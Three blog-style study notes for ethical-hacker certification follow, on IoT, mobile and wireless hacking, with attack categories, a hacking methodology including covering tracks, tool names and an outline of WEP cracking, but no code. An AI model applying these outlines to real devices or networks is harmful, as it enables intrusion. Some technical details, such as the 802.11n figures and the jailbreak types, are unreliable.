CEH (XIX): IoT Hacking

The index of this series of articles can be found here.

IoT is the concept of basically connecting any device with an on and off switch to the Internet (and/or to each other). This includes everything from cellphones, coffee makers, washing machines, headphones, lamps, wearable devices and almost anything else you can think of. This also applies to components of machines, for example, a jet engine of an aeroplane or the drill of an oil rig. As I mentioned, if it has an on and off switch then chances are it can be a part of the IoT.

On a broader scale, the IoT can be applied to things like transportation networks: “smart cities” which can help us reduce waste and improve efficiency for things such as energy use; this helping us understand and improve how we work and live. Take a look at the visual below to see what something like that can look like.

The architecture of IoT depends upon five layers which are:

  • Application layer: Layer responsible for delivering the data to the users at the application layer. This is the user interface to control, manage and command IoT devices.
  • Middleware layer: It is for device and information management.
  • Internet layer: It is responsible for end-points connectivity.
  • Access gateway layer: It is responsible for protocol transmission and messaging.
  • Edge technology layer: It covers IoT capable devices.

IoT Communication Models

There are several ways in which IoT devices can communicate. The following are some of these models:

  • Device-to-Device Model: It is a basic model where two devices talk to each other without interfering any other device. Communication is established using some kind of wireless connection. Wi-Fi, Bluetooth, NFC or RFID can be examples of this model.
  • Device-to-Cloud Model: In this model, IoT devices communicate to each other communicating through an application server. For example, manufacturing environments where a usually big amount of sensors send information to a server. Application servers process the data and perform automated actions based on that analysis.
  • Device-to-Gateway Model: Similar to the Device-to-Cloud model, and IoT device gateway is added. The function of this gateway is to collect the data from the devices and, send it to a remote application server. In addition, offers a consolidated point where checks that the data is flowing can be done. Plus, it can provide security and protocol translation functionalities.
  • Back-End Data-sharing Model: This model extends the Device-to-Cloud model in a scalable scenario where multiple parties can access and control IoT devices and sensors. In this model, IoT devices communicate with an application server too.

Understanding IoT Attacks

In addition to the traditional attacks ones, other major challenges can be found in IoT environments:

  • Lack of security
  • Vulnerable interfaces
  • Physical security risk
  • Lack of vendor support
  • Difficulties to update firmware and OS
  • Interoperability issues

The last version of the OWASP IoT Top 10 define the next vulnerabilities:

  • Weak, Guessable, or Hardcoded Password: Use of easily brute-forced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grants unauthorized access to deployed systems.
  • Insecure Network Services: Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control.
  • Insecure Ecosystem Interfaces: Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allows compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.
  • Lack of Secure Update Mechanism: Lack of ability to securely update the device. This includes lack of firmware validation on devices, lack of secure delivery (un-encrypted in transit), lack of anti-rollback mechanisms, and lack of notifications of security changes due to updates.
  • Use of Insecure or Outdated Components: Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating system platforms and the use of third-party software or hardware components from a compromised supply chain.
  • Insufficient Privacy Protection: User’s personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.
  • Insecure Data Transfer and Storage: Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.
  • Lack of Device Management: Lack of security support on devices deployed in production, including asset management, update management, secure decommissioning, systems monitoring, and response capabilities.
  • Insecure Default Settings: Devices or systems shipped with insecure default settings or lack the ability to make the system more secure by restricting operators from modifying configurations.
  • Lack of Physical Hardening: Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.

IoT Attack Areas

The following are the most common attack areas for IoT networks:

  • Device memory containing credentials
  • Access control
  • Firmware extraction
  • Privileges escalation
  • Resetting to an insecure state
  • Removal of storage media
  • Web attack
  • Firmware attacks
  • Network services attacks
  • Unencrypted local data storage
  • Confidentiality and integrity issues
  • Cloud computing attacks
  • Malicious updates
  • Insecure APIs
  • Mobile application threats

IoT Attacks

  • DDoS attacks: Using this technique all the services associated with an IoT network can be targeted, devices, gateways and application servers.
  • Rolling code attacks: Rolling code or code hooping is another technique where attacker capture the code, sequence or signal coming from transmitter devices and simultaneously block the receivers. The code will be used later to gain unauthorised access. For example, the opening signal of a car that can be recorded and reproduce it later.
  • BlueBorne attacks: It is the use of different techniques to exploit Bluetooth vulnerabilities to gain unauthorised access.
  • Jamming jack: Jamming a signal to prevent devices communication.
  • Backdoor: Deploying a backdoor on a computer of an employee or victim to gain access to the IoT network. Tricks do not always need to apply to de IoT devices.

Other general attacks are:

  • Eavesdropping
  • Sybil attack
  • Exploit kits
  • MitM attacks
  • Replay attacks
  • Forged malicious devices
  • Side-channel attack
  • Ransomware attack

IoT Hacking Methodology

The methodology applied on IoT platforms is the same than the one is applied to other platforms.

  • Information gathering: IP addresses, running protocols, open ports, type of devices, vendor’s information, etc. Shodan, Censys and Thingful are search engines to find information about IoT devices. Shodan is a great tool for discovering and gathering information from IoT devices deployed around the world.
  • Vulnerability scanner: Scanning network and devices looking for vulnerabilities, weak passwords, software and firmware bugs, default configurations, etc. Nmap and others are very helpful tools.
  • Launch attack: Exploiting the vulnerabilities using different attacks like DDoS, Rolling code, jamming, etc. RFCrack, Attify Zigbee and HackRF One are popular tools for hacking.
  • Gain access: Taking control over an IoT environment. Gaining access, escalating privileges, and backdoor installation are included in this phase among others.
  • Maintain attack: Includes login out without being detected, clearing logs and covering tracks.

Countermeasures

Countermeasures include:

  • Firmware updates
  • Block unnecessary ports
  • Disable telnet
  • Use encryption communication such as SSL/TLS
  • Use strong passwords
  • Use encryption in drivers
  • User account lockout
  • Periodic assessment of devices
  • Secure password recovery
  • Two-factor authentication
  • Disable UPnP
CEH (XIX): IoT Hacking

CEH (XVIII): Hacking Mobile Platforms

The index of this series of articles can be found here.

Mobile phones, they are nowadays everywhere. They are used for entertainment, work, personal finances and services, almost anything we can imagine. In addition, there are a in the market a big variety of systems running on these mobile devices such as iOS, Blackberry OS, Android, Symbian, Windows, etc.

For all these reasons, these mobile devices must have strong security and not just a feeling of been secure to protect their users and all the private information they store. Plus, with the Bring Your Own Device philosophy, devices can cause multiple problems in corporate environments and networks.

Mobile Platform Attack Vectors

The OWASP project publishes an unbiased and practical list of the top 10 most common attacks on mobile platforms:

Top 10 (2016)Top 10 (2014)
Improper Platform UsageWeak Server Side Controls
Insecure Data StorageInsecure Data Storage
Insecure CommunicationInsufficient Transport Layer Protection
Insecure AuthenticationUnintended Data Leakage
Insufficient CryptographyPoor Authorization and Authentication
Insecure AuthorizationBroken Cryptography
Client Code QualityClient-Side Injection
Code TamperingSecurity Decisions Via Untrusted Inputs
Reverse EngineeringImproper Session Handling
Extraneous FunctionalityLack of Binary Protections

More information can be found at the project’s page OWASP Mobile Top 10.

Mobile Attack Vector

There are several threads and attacks on mobile devices. Some of the most basics examples are malware, data loss, integrity attacks, social engineering attacks, etc. Mobile attack vectors include:

  • Malware
  • Data loss
  • Data Tampering
  • Data Exfiltration

Vulnerabilities and Risks on Mobile Platforms

Some of the risks for mobile platforms are:

  • Malicious third-party applications
  • Malicious applications on Store
  • Malware and rootkits
  • Application vulnerabilities
  • Data security
  • Excessive permissions
  • Weak encryption
  • Operative system update issues
  • Application updates issues
  • Jailbreak and rooting
  • Physical attacks

Application Sandbox Issue

Application sandboxing, also called application containerization, is an approach to software development and mobile application management (MAM) that limits the environments in which certain code can execute.

The goal of sandboxing is to improve security by isolating an application to prevent outside malware, intruders, system resources or other applications from interacting with the protected app. The term sandboxing comes from the idea of a child’s sandbox, in which the sand and toys are kept inside a small container or walled area.

Application sandboxing is controversial because its complexity can cause more security problems than the sandbox was originally designed to prevent. The sandbox has to contain all the files the application needs to execute, which can also create problems between applications that need to interact with one another. Still, it is one of the best security methods to be used when developing for mobile devices.

However, advance malicious applications can be designed to bypass the sandbox technology. Fragmented codes and sleep timers are common techniques adopted by attackers to bypass the inspection process.

Mobile Spam and Phishing

Mobile devices and technologies are just another path attackers can choose to send emails or messages spamming users or trying to convince them to click and access malicious links searching for credentials or information.

Open Wi-Fi and Bluetooth Networks

Public or unencrypted Wi-Fi or Bluetooth networks are another easy way for attackers to intercept communications and reveal information.

Hacking Android OS

Android is an operating system developed by Google for smartphones. But, it is not only present in smartphones, but it can also be found in other devices like gaming consoles, PCs and IoT devices. Android OS brings flexible features with an open-source platform.

Android OS has very wide support for and integration with different hardware and services what is one of its major features, and receives periodically updates.

One of the most successful features is also one of the major security flows for Android devices been this the flexibility to install third-party apps not just from trusted stores by applications (APKs) from other sources of the Internet.

Device Administration API

In version 2.2 of the Android SO the Device Administration API was introduced to ensure the administration of the device at the system level and offering control over Android devices within a corporate network. Using this security-aware API, administrators can perform several actions including wiping the device remotely or manage installed applications.

Root Access / Android Rooting

Rooting is basically the process of gaining privileged control over a device, commonly known as Root access. As in one other Linux kernel-based system, root access gives superuser permissions. These permissions allow to modify the system settings and configurations and overcome limitations and restrictions. The rooting process can be used for malicious intentions such as the installation of malicious applications, analysing custom firmware of given unnecessary permission to applications.

Android stack

Android Phone Security Tools

There are multiple Android security tools that can be found in the stores but, when installing them, users need to keep in mind and be sure of their authenticity and that the companies or developers behind them are legitimate.

Hacking iOS

iOS is the operative system developed by Apple for their iPhones and nowadays it can be found in other devices of the company like iPads and iPods. Together with Android, they are the two most popular operative systems for mobile devices.

Major versions of the operative system tend to be released yearly. Two of the major security improvements iOS brings to the table are hardware-accelerated encryption and application isolation where one application cannot access another application’s data.

iOS Jailbreak

A jailbreak is a form of rooting resulting in privilege escalation. Jailbreak is usually done to remove or bypass the factory default restrictions by using kernel patches or device customisation. Jailbreak allows root access to the device what allows users to install unofficial applications.

Types of Jailbreak

  • Userland exploits: This jailbreak allows user-level access without scaling to about-level access.
  • iBoot exploits: This jailbreak allows user-level and boot-level access.
  • Bootrom exploits: This jailbreak allows user-level and boot-level access.

Jailbreak Techniques

  • Tethered Jailbreak: A tethered jailbreak is one that temporarily pwns a handset for a single boot. After the device is turned off (or the battery dies), it cannot complete a boot cycle without the help of a computer-based jailbreak application and a physical cable connection between the device and the computer in question.
  • Semi-tethered Jailbreak: A semi-tethered jailbreak is one that permits a handset to complete a boot cycle after being pwned, but jailbreak extensions will not load until a computer-based jailbreak application is deployed over a physical cable connection between the device and the computer in question.
  • Semi-untethered Jailbreak: A semi-untethered jailbreak is one that permits a handset to complete a boot cycle after being pwned, but jailbreak extensions will not load until a side-loaded jailbreak app on the device itself is deployed.
  • Untethered Jailbreak: An untethered jailbreak is one that permits a handset to complete a boot cycle after being pwned without any interruption to jailbreak-oriented functionality.

Jailbreak Tools

There are multiple jailbreak tools such as:

  • Pangu
  • evasi0n7
  • LimeRaln
  • BlackRaln

Hacking Windows Phone OS

Windows Phone OS is another mobile operative system developed by Microsoft. Windows Phone 8 is the second generation of the Windows Phone mobile operating system from Microsoft. It was released on October 29, 2012, and, like its predecessor, it features a flat user interface based on the Metro design language. It was succeeded by Windows Phone 8.1, which was unveiled on April 2, 2014.

Windows Phone 8 replaces the Windows CE-based architecture used in Windows Phone 7 with the Windows NT kernel found in Windows 8. Current Windows Phone 7 devices cannot run or update to Windows Phone 8, and new applications compiled specifically for Windows Phone 8 are not made available for Windows Phone 7 devices. Developers can make their apps available on both Windows Phone 7 and Windows Phone 8 devices by targeting both platforms via the proper SDKs in Visual Studio.

Windows Phone 8 devices are manufactured by Microsoft Mobile (formerly Nokia), HTC, Samsung and Huawei.

Some features supported are:

  • Native code support (C++)
  • NFC
  • Remote device management
  • VoIP and video chat integration
  • UEFI and firmware over the air for windows phone update
  • App sandboxing

Hacking BlackBerry

BlackBerry OS is a proprietary mobile operating system designed specifically for Research In Motion’s (RIM) BlackBerry devices. The BlackBerry OS runs on Blackberry variant phones.

The BlackBerry OS is designed for smartphone environments and is best known for its robust support for push Internet email and was considered as the most prominent and secure mobile phones.

Traditionally, BlackBerry applications are written using Java, particularly the Java Micro Edition (Java ME) platform. However, RIM introduced the BlackBerry Web development platform in 2010, which makes use of the widget software development kit (SDK) to create small standalone Web apps made up of HTML, CSS and JavaScript code.

BlackBerry Attack Vectors

  • Malicious code signing: It the process where attacker after obtaining a code-signing key from the code-signing service sign a malicious application and uploads it to the BlackBerry App Store to be distributed to users.
  • JAD file exploits: JAD stands for Java Application Descriptor file. Files with the .jad extension are descriptor files that are commonly used to describe the contents of a MIDlet that are created for the Java ME virtual machine. Attackers can trick users to install malicious .jad files pointing to malicious download links to obtain an application or, even, they can be crafted to run DoS attacks.

Mobile Device Management (MDM)

Mobile device management (MDM), is the process of managing everything about a mobile device. MDM includes storing essential information about mobile devices, deciding which apps can be present on the devices, locating devices, and securing devices if lost or stolen. Many businesses use a third-party mobile device management software such as Mobile Device Manager Plus to manage mobile devices. Mobile Device Management has expanded its horizons to evolve into Enterprise Mobility Management (EMM).

Mobile devices now have more capabilities than ever before, which has ultimately led to many enterprises adopting a mobile-only or mobile-first workforce. In these types of environments, both personal (BYOD) and corporate-owned mobile devices are the primary devices used for accessing or interacting with corporate data.

Mobile Device Management (MDM) is important for enterprises focussing on improving productivity and security. They allow:

  • Ease deployments
  • Efficient Integrations
  • Manage multiple device types
  • Achieve compliance
  • Enhanced security
  • Remote management

And provide some functions such as:

  • Enforcing a device to be locked after certain login failures.
  • Enforcement of strong password policies for all BYOD devices.
  • MDM can detect any attempt of hacking on BYOD devices and limit their network access for those affected devices.
  • Enforcing confidentiality by using encryption as per organizations policy.
  • Administration and implementation of Data Loss Prevention (DLP) for BYOD devices.

MDM Deployment Methods

Generally, there are two types of deployments:

On-site MDM Deployment

Involves the installation of MDM applications on local servers inside the corporate data centres or offices and its managed by local staff available on-premises.

The major advantage is the granular control over the management of the BYOD devices, which, in some extend, extends the security.

The on-site MDM deployment has the next components or areas:

  • Data centre: All the necessary services and serves to manage the infrastructure, connectivity, access and security policies.
  • Internet edge: Its basic purpose is to provide connectivity to the public internet. Firewalls, filters, monitors for ingress and egress traffic and, wireless controllers and access points for guest users.
  • Services layer: Contain wireless controllers and access points used by users in the corporate environment. And sometimes services like NTP or other support services.
  • Core layer: Just like every other design, the core is the focal point of the whole network regarding routing of traffic in a corporate network environment.
  • Campus Building: A distribution layer that acts as ingress/egress point for all traffic in a campus building, where users can connect using switches or wireless access points.

Cloud-based MDM deployment

In this type of deployment, the MDM software is installed and managed by a third-party service and, this is one of the best advantages of this type due to the maintenance and troubleshooting been the responsibility of the service provider.

The cloud-based MDM deployment has the next components or areas:

  • Data centre: All the necessary services and serves to manage the infrastructure, connectivity, access and security policies.
  • Internet edge: Its basic purpose is to provide connectivity to the public internet. Firewalls, filters, monitors for ingress and egress traffic and, wireless controllers and access points for guest users.
  • WAN: Provides VPN connectivity from branch offices to the corporate office, internet access from branch offices and connectivity to cloud-based MDM application software. MAintain policies and configurations for BYOD devices connected to the corporate network.
  • WAN edge: This component act as a focal point for all ingress/egress WAN traffic from and going to branch offices.
  • Services layer: Contain wireless controllers and access points used by users in the corporate environment. And sometimes services like NTP or other support services.
  • Core layer: Just like every other design, the core is the focal point of the whole network regarding routing of traffic in a corporate network environment.
  • Branch offices: This component is compromised of few routers acting as the focal point of ingress and egress traffic out of branch offices. USer can connect using access switches or wireless access points.

Bring Your Own Device (BYOD)

The BOYD concept makes life easier for users but represents some new challenges for network engineers and designers. Network engineers and designers need to find a way to balance the constant mutation of their networks and the offering of seamless wireless connectivity with maintaining good security for organisations.

Some reason to implement BYOD solutions are:

  • A wide variety of consumer devices: Smartphones, tablets, laptops and others of multiple brands and types belonging to users need to be, nowadays, added to the network and, they need to complain with organisation’s policies and, of course, have all the connectivity.
  • No schedules: Not any more strict working hours, users can join a network when is convenient for them early, late, launch time even weekends.
  • Deslocalisation: Not just working from offices buildings or corporative environments, users can now connect from everywhere and have the need to access to the company resources.

BYOD Architecture Framework

Some elements that can be found in BYOD environments are:

  • BYOD devices: All the devices allowed to connect to the corporate network to allow users to perform their job.
  • Wireless access points: They provide wireless connectivity on-premises and they are installed in the physical network of a company.
  • Wireless LAN controllers: WLAN controllers provide centralised management and monitoring of the WLAN solution. They are integrated with the identity service engine to enforce the authentication and authorisation of the BYOW devices.
  • Identity service engine: They implement the authentication, authorisation and accounting for end-points devices.
  • VPN solutions: They provide connectivity to corporate networks for end-users allowing confidentiality of data.
  • Integrated services router (ISR): Prefered in BYOD architectures to provide WAN and Internet access in corporate environments to BYOD devices.
  • Aggregation services router (ASR): It provides WAN and Internet access in corporate environments and acts as aggregation points for connections coming from the branches and home-offices.
  • Cloud web security (CWS): It provides enhanced web security for all BYOD devices that access the Internet using public 3G/4G networks.
  • Adaptive security appliance (ASA): It provides standard security solutions at the Internet edge like IDS or IPS and acts as a termination point for the VPN connections.
  • RSA SecurID: It provides one-time passwords to access network applications for BYOD devices.
  • Active Directory: It provides central command and control of domain users, computers and network printers. It restricts access to network resources.
  • Certificate authority: It allows to provide access to the network only to BYOD devices that have a valid certificate installed.

Mobile Security Guidelines

Mobil devices have a big amount of in-build security features and measures, this together with tools available on the Stores can craft good security but, in addition, some beneficial guidelines to secure mobile phones are as follows:

  • Avoid auto-upload of files and photos.
  • Perform security assessments of applications.
  • Turn off the Bluetooth.
  • Allow only necessary GSP-enabled applications.
  • Do not connect to open networks or public networks unless it is necessary.
  • Install applications for trusted or official stores.
  • Configure strong passwords.
  • Use mobile device management software.
  • Use remote wipe services.
  • Update operative systems.
  • Do not allow rooting/jailbreaking.
  • Encrypt your phone.
  • Periodic backups.
  • Filter emails.
  • Configure application certification rules.
  • Configure mobile device policies.
  • Configure auto-lock.
CEH (XVIII): Hacking Mobile Platforms

CEH (XVII): Hacking Wireless Networks

The index of this series of articles can be found here.

A wireless network allows devices to stay connected to the network but roam untethered to any wires. Access points amplify Wi-Fi signals, so a device can be far from a router but still be connected to the network. Previously it was thought that wired networks were faster and more secure than wireless networks. But continual enhancements to wireless network technology such as the Wi-Fi 6 networking standard have eroded speed and security differences between wired and wireless networks.

Usually, wireless communications rely on radio communications. Different frequency ranges are used for different types of wireless technologies depending upon the requirements.

Wireless Terminology

GSM

GSM (Global System for Mobile communications) is an open, digital cellular technology used for transmitting mobile voice and data services. GSM supports voice calls and data transfer speeds of up to 9.6 kbps, together with the transmission of SMS (Short Message Service).

GSM operates in the 900MHz and 1.8GHz bands in Europe and the 1.9GHz and 850MHz bands in the US. GSM services are also transmitted via 850MHz spectrum in Australia, Canada and many Latin American countries. The use of harmonised spectrum across most of the globe, combined with GSM’s international roaming capability, allows travellers to access the same mobile services at home and abroad. GSM enables individuals to be reached via the same mobile number in up to 219 countries.

Terrestrial GSM networks now cover more than 90% of the world’s population. GSM satellite roaming has also extended service access to areas where terrestrial coverage is not available.

Access Point

A wireless access point (WAP), or more generally just access point (AP), is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. The AP usually connects to a router (via a wired network) as a standalone device, but it can also be an integral component of the router itself. An AP is differentiated from a hotspot which is a physical location where Wi-Fi access is available.

SSID

A Wi-Fi network’s SSID is the technical term for its network name. SSID stands for “Service Set Identifier”. Under the IEEE 802.11 wireless networking standard, a “service set” refers to a collection of wireless networking devices with the same parameters. So, the SSID is the identifier (name) that tells you which service set (or network) to join.

BSSID

The BSSID is the MAC address of the wireless access point (WAP) generated by combining the 24-bit Organization Unique Identifier (the manufacturer’s identity) and the manufacturer’s assigned 24-bit identifier for the radio chipset in the WAP.

ISM Band

Industrial, Scientific and Medical band, as a part of the radio spectrum that can be used for any purpose without a license in most countries. 902-928 MHz, 2.4 GHz and 5.7-5.8 GHz bands are used for machines that emitted radio frequencies, industrial heaters and microwave ovens, but not for radio communications.

Orthogonal Frequency Division Multiplexing (OFDM)

Orthogonal Frequency Division Multiplexing is a digital transmission technique that uses a large number of carriers spaced apart at slightly different frequencies. First promoted in the early 1990s for wireless LANs, OFDM is used in many wireless applications including Wi-Fi, WiMAX, LTE, ultra-wideband (UMB), as well as digital radio and TV broadcasting in Europe and Japan. It is also used in land-based ADSL (see OFDMA).

Frequency-hopping Spread Spectrum (FHSS)

Frequency-hopping spread spectrum (FHSS) is a method of transmitting radio signals by rapidly changing the carrier frequency among many distinct frequencies occupying a large spectral band. The changes are controlled by a code known to both transmitter and receiver. FHSS is used to avoid interference, to prevent eavesdropping, and to enable code-division multiple access (CDMA) communications.

Types of Networks

Types of wireless networks deployed in a geographical area can be categorised as:

  • Wireless personal area network (WPAN)
  • Wireless local area network (WLAN)
  • Wireless metropolitan area network (WMAN)
  • Wireless wide area network (WWAN)

However, a wireless network can be defined in different types depending upon the deployment scenarios. The following are some of the wireless network types that are used in different scenarios:

  • Extension to a wired network
  • Multiple access points
  • 3G/4G hotspot

Wireless Standards

StandardFrequencyModulationSpeed
802.11a5 GHzOFDM54 Mbps
802.11b2.4 GHzDSSs11 Mbps
802.11g2.4 GHzOFDM, DSSS54 Mbps
802.11n5 GHzOFDM54 Mbps
802.16 (WIMAX)10 – 66 GHzOFDM70 – 1000 Mbps
Bluetooth2.4 GHz1 – 3 Mbps

Wi-Fi

Wi-Fi is a family of wireless networking technologies, based on the IEEE 802.11 family of standards, which are commonly used for local area networking of devices and Internet access. Wi‑Fi is a trademark of the non-profit Wi-Fi Alliance, which restricts the use of the term Wi-Fi Certified to products that successfully complete interoperability certification testing.

They transmit at frequencies of 2.4 GHz or 5 GHz. This frequency is considerably higher than the frequencies used for cell phones, walkie-talkies and televisions. The higher frequency allows the signal to carry more data.

They use 802.11 networking standards, which come in several flavours:

  • 802.11a transmits at 5 GHz and can move up to 54 megabits of data per second. It also uses orthogonal frequency-division multiplexing (OFDM), a more efficient coding technique that splits that radio signal into several sub-signals before they reach a receiver. This greatly reduces interference.
  • 802.11b is the slowest and least expensive standard. For a while, its cost made it popular, but now it is becoming less common as faster standards become less expensive. 802.11b transmits in the 2.4 GHz frequency band of the radio spectrum. It can handle up to 11 megabits of data per second, and it uses complementary code keying (CCK) modulation to improve speeds.
  • 802.11g transmits at 2.4 GHz like 802.11b, but it is a lot faster – it can handle up to 54 megabits of data per second. 802.11g is faster because it uses the same OFDM coding as 802.11a.
  • 802.11n is the most widely available of the standards and is backwards compatible with a, b and g. It significantly improved speed and range over its predecessors. For instance, although 802.11g theoretically moves 54 megabits of data per second, it only achieves real-world speeds of about 24 megabits of data per second because of network congestion. 802.11n, however, reportedly can achieve speeds as high as 140 megabits per second. 802.11n can transmit up to four streams of data, each at a maximum of 150 megabits per second, but most routers only allow for two or three streams.
  • 802.11ac is the newest standard as of early 2013. It has yet to be widely adopted and is still in draft form at the Institute of Electrical and Electronics Engineers (IEEE), but devices that support it are already on the market. 802.11ac is backwards compatible with 802.11n (and therefore the others, too), with n on the 2.4 GHz band and ac on the 5 GHz band. It is less prone to interference and far faster than its predecessors, pushing a maximum of 450 megabits per second on a single stream, although real-world speeds may be lower. Like 802.11n, it allows for transmission on multiple spatial streams – up to eight, optionally. It is sometimes called 5G WiFi because of its frequency band, sometimes Gigabit WiFi because of its potential to exceed a gigabit per second on multiple streams and sometimes Very High Throughput (VHT) for the same reason.

Wi-Fi Authentication Modes

There are different authentication methods for WiFi-based networks:

Open Authentication to the Access Point

Open authentication allows any device to authenticate and then attempt to communicate with the access point. Using open authentication, any wireless device can authenticate with the access point, but the device can communicate only if it is Wired Equivalent Privacy (WEP) keys match the access point’s WEP keys. Devices that are not using WEP do not attempt to authenticate with an access point that is using WEP. Open authentication does not rely on a RADIUS server on your network.

Shared Key Authentication to the Access Point

During shared key authentication, the access point sends an unencrypted challenge text string to any device that is attempting to communicate with the access point. The device that is requesting authentication encrypts the challenge text and sends it back to the access point. If the challenge text is encrypted correctly, the access point allows the requesting device to authenticate.

Both the unencrypted challenge and the encrypted challenge can be monitored, however, which leaves the access point open to attack from an intruder who calculates the WEP key by comparing the unencrypted and encrypted text strings. Because of this vulnerability to attack, shared key authentication can be less secure than open authentication. Like open authentication, shared key authentication does not rely on a RADIUS server on your network.

EAP Authentication to the Network

This authentication type provides the highest level of security for your wireless network. By using the Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the access point helps a wireless client device and the RADIUS server to perform mutual authentication and derive a dynamic unicast WEP key. The RADIUS server sends the WEP key to the access point, which uses the key for all unicast data signals that the server sends to or receives from the client. The access point also encrypts its broadcast WEP key (which is entered in the access point’s WEP key slot 1) with the client’s unicast key and sends it to the client.

MAC Address Authentication to the Network

The access point relays the wireless client device’s MAC address to a RADIUS server on your network, and the server checks the address against a list of allowed MAC addresses. Because intruders can create counterfeit MAC addresses, MAC-based authentication is less secure than EAP authentication. However, MAC-based authentication provides an alternate authentication method for client devices that do not have EAP capability. See the “Assigning Authentication Types to an SSID” section for instructions on enabling MAC-based authentication.

Combining MAC-Based, EAP, and Open Authentication

You can set up the access point to authenticate client devices that use a combination of MAC-based and EAP authentication. When you enable this feature, client devices that use 802.11 open authentications to associate to the access point first attempt MAC authentication. If MAC authentication succeeds, the client device joins the network. If MAC authentication fails, EAP authentication takes place.

Using WPA Key Management

Wi-Fi Protected Access (WPA) is a standards-based, interoperable security enhancement that strongly increases the level of data protection and access control for existing and future wireless LAN systems. It is derived from and will be forward-compatible with the upcoming IEEE 802.11i standard. WPA leverages TKIP (Temporal Key Integrity Protocol) for data protection and 802.1X for authenticated key management.

WPA key management supports two mutually exclusive management types: WPA and WPA-Pre-shared key (WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each other using an EAP authentication method, and the client and server generate a pairwise master key (PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that pre-shared key is used as the PMK

Wi-Fi Chalking

Wi-Fi Chalking includes several methods to detect open wireless networks, there are some of them:

  • WarWalking: Walking around to detect open networks.
  • WarChalking: Using symbols and signs to advertise open wireless networks.
  • WarFlying: Detection of open wireless using drones.
  • WarDriving: Driving around to detect open wireless networks.

Types of Wireless Antennas

  • Directional Antenna: Directional antennas, as the name implies, focus the wireless signal in a specific direction resulting in a limited coverage area. An analogy for the radiation pattern would be how a vehicle headlight illuminates the road. Types of Directional antennas include Yagi, Parabolic grid, patch and panel antennas.
  • Omni-Directional: Omni-directional antennas provide a 360º doughnut-shaped radiation pattern to provide the widest possible signal coverage in indoor and outdoor wireless applications. An analogy for the radiation pattern would be how an un-shaded incandescent light bulb illuminates a room. Types of Omni-directional antennas include “rubber duck” antennas often found on access points and routers, Omni antennas found outdoors, and antenna arrays used on cellular towers.
  • Parabolic Antenna: A parabolic antenna is an antenna that uses a parabolic reflector, a curved surface with the cross-sectional shape of a parabola, to direct the radio waves. The most common form is shaped like a dish and is popularly called a dish antenna or parabolic dish.
  • Yagi Antenna: A Yagi–Uda antenna, commonly known as a Yagi antenna, is a directional antenna consisting of multiple parallel elements in a line, usually half-wave dipoles made of metal rods.
  • Dipole Antenna: A dipole antenna or doublet is the simplest and most widely used class of antenna. The dipole is any one of a class of antennas producing a radiation pattern approximating that of an elementary electric dipole with a radiating structure supporting a line current so energized that the current has only one node at each end.

Wireless Encryption

WEP

Wired Equivalent Privacy (WEP), introduced as part of the original 802.11 standards ratified in 1997, it is probably the most used Wi-Fi Security protocol out there. It is pretty recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits). In 2004, both WEP-40 and WEP-104 were declared deprecated. There were 128-bit (most common) and 256-bit WEP variants, but with ever-increasing computing power enable attackers to exploit numerous security flaws. All in all, this protocol is “dead“.

Breaking this encryption can be performed by following the next steps:

  • Monitor the access point channel.
  • Test injection capability of the access point.
  • Use a tool for fake authentication.
  • Sniff the packets in the network.
  • Use an encryption tool to inject packets.
  • Use a cracking tool to extract the encryption key from the initialisation vector (IV).

WPA

Wi-Fi Protected Access (WPA), became available in 2003, and it was the Wi-Fi Alliance’s direct response and replacement to the increasingly apparent vulnerabilities of the WEP encryption standard. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-bit keys used in the WEP system.

WPA included message integrity checks (to determine if an attacker had captured/altered packets passed between the access point and client) and the Temporal Key Integrity Protocol (TKIP). TKIP employs a per-packet key system that was radically more secure than the fixed key system used by WEP. The TKIP encryption standard was later superseded by Advanced Encryption Standard (AES).

TKIP uses the same underlying mechanism as WEP and consequently is vulnerable to a number of similar attacks (e.g. Chop-Chop, MIC Key Recovery attack).

Usually, people do not attack WPA protocol directly, but a supplementary system that was rolled out with WPA – Wi-Fi Protected Setup (WPS).

WPA2

WPA2 replaced WPA. Certification began in September 2004 and from March 13, 2006, it was mandatory for all new devices to bear the Wi-Fi trademark. The most important upgrade is the mandatory use of AES algorithms (instead of the previous RC4) and the introduction of CCMP (AES CCMP, Counter Cipher Mode with Block Chaining Message Authentication Code Protocol, 128 Bit) as a replacement for TKIP (which is still present in WPA2, as a fallback system and WPA interoperability).

Wireless Threats

  • Access control attack: Attackers obtaining access to a non-authorised network.
  • Integrity and confidentiality attacks: Attacker intercept confidential information going through the network.
  • Availability attacks: Attackers prevent legitimate users to access a network.
  • Authentication attacks: Attacker try to impersonate legitimate users of the network.
  • Rogue access point attacks: By starting a rogue access point with the same SSID that an existent and legitimate one in the same location, attackers try to gain access to the network and the existent traffic.
  • Client mis-association: Placing a rogue access point outside areas where the legitimate ones are to take advantage of the auto-connect setting in user devices and capture the traffic generated.
  • Misconfigured access point attacks: Attackers gain access to existing access points by taking advantage of existing misconfigurations on the device.
  • Unauthorised association: By taking advantage of a user’s troyanised computer attackers can be allowed to connect to private networks.
  • Ad-hoc connection attacks: Ad-hoc connections tend to be insecure because they do not provide strong authentication and encryption making it possible for attackers to take advantage of them.
  • Jamming signal attacks: By simply emitting an interference signal, a jamming attacker can effectively block the communication on a wireless channel, disrupt the normal operation, cause performance issues, and even damage the control system.

Wireless Attack Methodology

  • Wi-Fi discovery: Collect information by active footprinting.
  • GPS mapping: Creation of a list of existing access points and their locations.
  • Wireless traffic analysis: Capturing packets to reveal any information about the access point and the network.
